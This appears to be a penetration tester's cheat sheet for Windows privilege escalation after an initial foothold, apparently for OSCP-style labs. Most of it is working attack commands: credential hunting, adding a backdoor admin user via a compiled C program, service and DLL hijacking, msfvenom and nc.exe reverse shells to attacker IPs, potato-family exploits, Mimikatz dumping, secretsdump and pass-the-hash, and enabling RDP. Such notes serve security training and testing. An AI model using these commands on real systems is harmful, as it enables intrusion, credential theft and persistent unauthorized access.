After Windows Foothold

Local Enumeration

cmd

User enum:

whoami
whoami /groups - display groups of current user
whoami /priv - check our privileges
net user - get list of all local users on machine (this will not include service accounts such as inetserv)
net user steve - get user info for steve
net group /domain - all local groups
net localgroup administrator - can sometimes not work as just net localgroup if we don’t have a logged in session
net group "Domain Admins" /domain
dsquery user
dsquery computer
dsquery * -filter "(&(objectCategory=person)(objectClass=user)(userAccountControl:1.2.840.113556.1.4.803:=32))" -attr distinguishedName userAccountControl (PASSWD_NOTREQD)

findstr (grep for Windows) commands: https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/findstr

wmic cpu get DataWidth, Description, AddressWidth - check architecture
wmic qfe - check patches
wmic logicaldisk get caption, description, providername - checks drives

Network enum:

ipconfig or ipconfig /all
arp -a - (arp -all) - checks IP and MAC addresses
netstat -ano - what ports are listening/connected, take note if anything is firewalled or not shown in the originalnmap scan

Running Processes/Services

tasklist - Get a list of running processes
tasklist /SVC - services
- net start - check which services are runnings

Scheduled Tasks:

schtasks /query /fo LIST /v
schtasks /query /fo LIST /v | findstr /i "TaskName:"

Search:

where /R c:\windows bash.exe - where in C:\Windows is bash.exe (/R means recursive)
dir /R - like ls -la

Password hunting:

findstr /si password *.txt *.ini *.config - checks from whichever directory and subdirectories and ignores case for the string password
cmdkey /list - To list the stored credentials on the machine.
reg query HKLM /f pass /t REG_SZ /s - pay attention to ControlSet keys

Add user (if Admin)

net user $user $password /add
net localgroup Administrators $user /add

TCM Password Hunting

https://sushant747.gitbooks.io/total-oscp-guide/content/privilege_escalation_windows.html

Powershell

Get-LocalUser - get list of all local users
Get-LocalUser steve - same as net user steve
Get-LocalGroup - all local groups
Get-LocalGroupMember $groupName - list of users in that group
systeminfo - OS, version, architecture, etc
ipconfig /all - list all network interfaces
route print - display routing table containing all routes of the system
netstat -ano - list all active network connections
- a = all active TCP connections as well as TCP and UDP ports
- n = disable name resolution
- o = show process ID for each connection
Get-Process - show running processes
Get-Process $processName | Format-List * - get all information about a process

Finding info about applications:

Get-ItemProperty "HKLM:\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\" | select displayname- Displays 32 bit applications (remove ‘select displayname’ for more info)
Get-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\*" | select displayname - Displays 64 bit applications (remove ‘select displayname’ for more info):

Searching for specific things:

Command for finding “.kdbx” (KeePass) files:
- Get-ChildItem -Path C:\ -Include *.kdbx -File -Recurse -ErrorAction SilentlyContinue (for Keepass db)
Command for finding sensitive XAMPP info files:
- Get-ChildItem -Path C:\xampp -Include *.txt,*.ini -File -Recurse -ErrorAction SilentlyContinue
Checking for files in home directory
- Get-ChildItem -Path C:\Users\$user\ -Include *.txt,*.pdf,*.xls,*.xlsx,*.doc,*.docx -File -Recurse -ErrorAction SilentlyContinue

Runas: - runas user:$user cmd - will have to enter password after, but it gets a shell as that user - C:\Windows\System32\runas.exe /user:$DOMAIN\$User /save cred "C:\Windows\System32\cmd.exe /c $Command - C:\Windows\System32\runas.exe /user:$DOMAIN\$User /save cred "C:\Windows\System32\cmd.exe /c TYPE C:\Users\Administrator\Desktop\proof.txt > $outputlocation.txt - With InvokeRunasCs.ps1: - Import-Module .\Invoke-RunasCs.ps1 - Invoke-RunasCs svc_mssql trustno1 'c:/xampp/htdocs/uploads/nc.exe 192.168.45.204 4444 -e cmd.exe' - If this doesn’t work, the issue may be the upload location of the nc binary.

Get-History - may not work
(Get-PSReadlineOption).HistorySavePath
- Then cat or type output file and check that output for interesting files Download file from remote server
- iwr -uri http://$kaliIP/file.ext -outfile file.ext

Checking privileges on service binaries

https://github.com/gtworek/Priv2Admin - which privileges can do what

icacls Windows utility or
Get-ACL - PowerShell Cmdlet

Other Techniques

TCM list of Automated Tools

Executables:

winPEAS.exe - windows privilege escalation awesome script (check hacktrick bc it has the checklist)
Seabelt.exe - has to be compiled (sln files open in Visual Studio)
Watson.exe - has to be compiled (sln file)
SharpUp.exe

PowerShell

Sherlock.ps1 (predecessor to Watson)
PowerUp.ps1
jaws-enum.ps1 (jaws = just another windows script)

Other

windows-exploit-suggester.py (local from attack machine)
- requires systeminfo output from the machine
- seems to be mostly kernel exploits
Exploit Suggester (Metasploit)

PowerUp.ps1

Import-Module ./PowerUp.ps1

. .\PowerUp.ps1 Then Invoke-AllChecks
Check Abuse Function which gives necessary command

Registry Escalation:

reg query HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer
reg query HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Installer
If either of these are set to 1, you can run any msi with elevated permissions. Make an MSI and execute it.
PowerUp checks for this.
- Note that you may need to execute any file written after running the Abuse Function.
- Can also just create a .msi with msf.

Service Escalation - Registry (TCM)

Example for the regsvc service:

Powershell on target: Get-Acl -Path hklm:\System\CurrentControlSet\services\regsvc | fl
- take note if we have NT AUTHORITY\INTERACTIVE Allow Full Control for this service. If we do we can make a malicious executable run a command.
create a malicious .c file and compile it:
- Example:
- take an existing file and replace the command used by the system() function to: cmd.exe /k net localgroup administrators $user /add
- x86_64-w64-mingw32-gcc $exploit.c -o $exploit.exe
- this adds the $user to the administrators group
reg add HKLM\SYSTEM\CurrentControlSet\services\regsvc /v ImagePath /t REG_EXPAND_SZ /d $exploit.exe /f
sc start regsvc

Escalation Via Executable Files (TCM)

PowerUp.ps1
It will give a ServiceName, Path, ModifiablePath, … and AbuseFunction
Take $servicename.exe and replace the existing version in the modifiable path

Escalation via Startup Applications

icacls.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup"
Generate the exe wth msfvenom
Put the exe in the above folder
Need to reboot or have an administrator log in/out
Probably won’t see this in CTF or lab environment

DLL Hijacking

Go into process monitor and set filters for “Path ends with .dll” and “Result is NAME NOT FOUND”

We can overwrite if we can control the service and if the folder is writable
- If we have a vulnerable service called dllsvc:
  1. sc start dllsvc (or stop first, then start)
  2. Then check ProcMon
  3. msfvenom -p windows/x64/shell/reverse_tcp LHOST=192.169.0.100 LPORT=4444 -f dll -o msf.dll
  4. Then stop and start again
https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/dll-hijacking

Escalation via Binary Paths

run PowerUp.ps1 - Invoke-AllChecks
If our user has the "SERVICE_CHANGE_CONFIG" permission on the daclsvc service:
- sc config daclsvc binpath= "net localgroup administrators $user /add"
- sc stop daclsvc and sc start daclsvc

Unquoted Service Path Escalation

PowerUp.ps1
Example service path: C:\Program Files\Unquoted Path Service\Common Files\unquotedpathservice.exe
when the system is trying to run this executable, it will check for Program.exe, Program Files.exe, Program Files\Unquoted.exe… etc. So the goal is to place our malicious executable in any of those directories we have write access to. The example lab uses: C:\Program Files\Unquoted Path Service\Common.exe

CVE-2019-1388

If you get a pop up that says To continue, enter an admin user name and password. and has a Show more details option, you may be able to open up an internet explorer window showing the publisher’s certificate. It will open it up as a SYSTEM level user, so you can use internet explorer to pop a shell.

Wheel
Save as
File
Search for cmd, then right click and open it. It will open as nt authority\system.

UAC Bypass

Goal is to replace a service exe and either restart the service or reboot (shutdown /r /t 0) Malicious.c file below:

#include <stdlib.h> 

int main () 
{ 
int i; 

i = system ("net user poppop PartyParty123! /add"); 
i = system ("net localgroup administrators poppop /add"); 
   
return 0; 
}

Compile the C Program above, and you can use it to create a new admin user (poppop:PartyParty123!). -i686-w64-mingw32-gcc adduser.c -o adduser.exe

Potato Family

remember to try transferring the nc.exe binary When you have SeImpersonatePrivilege

Check what version you need (.NET) (Check .NET version): reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NET Framework Setup\NDP"
PrintSpoofer:
- .\PrintSpoofer.exe -c "nc.exe $kaliIP $port -e cmd"
- .\PrintSpoofer64.exe -i -c cmd
GodPotato: ".\GodPotato -cmd "nc -t -e C:\Windows\System32\cmd.exe $kaliIP $port"
Sweet Potato (where r.exe = msfvenom shell):.\SweetPotato.exe -e EfsRpc -p c:\Users\Public\nc64.exe -a "<ip> <port> -e cmd"
Sweet Potato: .\SweetPotato.exe -e EfsRpc -p c:\Users\Public\nc.exe -a "10.10.10.10 1234 -e cmd"

Mimikatz (local)

One liner: .\mimikatz.exe "privilege::debug" "token::elevate" "sekurlsa::msv" "sekurlsa::logonpasswords" "lsadump::sam" "exit"

privilege::debug
token::elevate
lsadump::sam
sekurlsa::logonpasswords
lsadump::dcsync /user:$domain\$user (to obtain NTLM hash)
- Then from kali: impacket-secretsdump -just-dc-user $user $domain.com /$user:"$password"@$targetIP
- From kali: impacket-psexec -hashes 00000000000000000000000000000000:$NTLMhash Administrator@$targetIP - From a GUI must be run as admin, (or in a cmd that is running as admin). UAC stops it otherwise. - sekurlsa::tickets can help steal a TGS or, even better a, TGT

Misc Windows Privesc

Running Processes Powershell

Get-WmiObject win32_service | Select-Object Name, State, PathName | Where-Object {$_.State -like 'Running'}
- NOTE: You cannot see higher priv processes in windows

Search for unquoted service paths:

wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v "C:\Windows\" | findstr /i /v """
wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v "C:\Windows\" | findstr /i /v """

Check to see if you have the ability to do privileged writes i.e. writing to System32. There are exploits available on hacktricks.

show firewall profile:

netsh advfirewall show currentprofile
netsh advfirewall firewall show rule name=all

Enumerate Installed Programs

wmic product get name, version, vendor

Enumerate Windows Updates

wmic qfe get Caption, Description, HotFixID, InstalledOn

Check for folders/files Everyone can write to:

Get-ChildItem "C:\Program Files" -Recurse | Get-ACL | ?{$_.AccessToString -match "Everyone\sAllow\s\sModify"}

List drivers:

(cmd)`driverquery.exe /v /fo csv ConvertFrom-CSV Select-Object ‘Display Name’, ‘Start Mode’, Path
(powershell) Get-WmiObject Win32_PnPSignedDriver | Select-Object DeviceName, DriverVersion, Manufacturer | Where-Object {$_.DeviceName -like "*VMware*"}

Notes:

Run ls, Get-ChildItem, or gci with -force (like ls -la but for Windows)

Post Exploit

#### FROM HACKTRICKS: Enable Remote Desktop reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f netsh firewall add portopening TCP 3389 "Remote Desktop"

::netsh firewall set service remotedesktop enable - I found that this line is not needed
::sc config TermService start= auto - I found that this line is not needed
::net start Termservice - found that this line is not needed